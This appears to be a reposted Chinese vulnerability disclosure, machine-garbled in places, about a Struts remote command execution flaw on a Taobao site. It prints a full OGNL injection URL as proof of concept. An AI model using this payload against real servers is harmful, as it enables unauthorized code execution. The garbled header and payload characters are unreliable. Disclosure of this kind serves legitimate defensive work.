神器而已之淘宝某站命令执行
漏洞标题 神器而已之淘宝某站命令执行 相关厂商 淘宝网 漏洞作者 举起手来 提交时间 2016-04-27 11:50 公开时间 2016-06-12 17:50 漏洞类型 命令执行 危害等级 高 自…
漏洞标题
神器只有淘宝站命令执行
相关制造商
淘宝
漏洞作者
举起手来
提交时间
2016-04-27 11: 50
公共时间
2016-06-12 17: 50
漏洞类型
命令执行
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
Struts,远程命令执行
漏洞详细信息
http://rap.taobao.org/account/all.action?method: [email protected]/* @ DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get%28%23parameters.rpsobj [0]%29,%23w.getWriter% 28%29.println%2888888888-1%29,%23w.getWriter%28%29.flush%28%29,%23w.getWriter%28%29.close%28%29,1?%23xx:%23request。的toString&安培; reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&安培; rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse
漏洞证明:
修理计划:
升级
版权声明:请注明出处,请举手@乌云
修理计划:
升级
版权声明:请注明出处,请举手@乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 531 )
- 分类:黑客技术
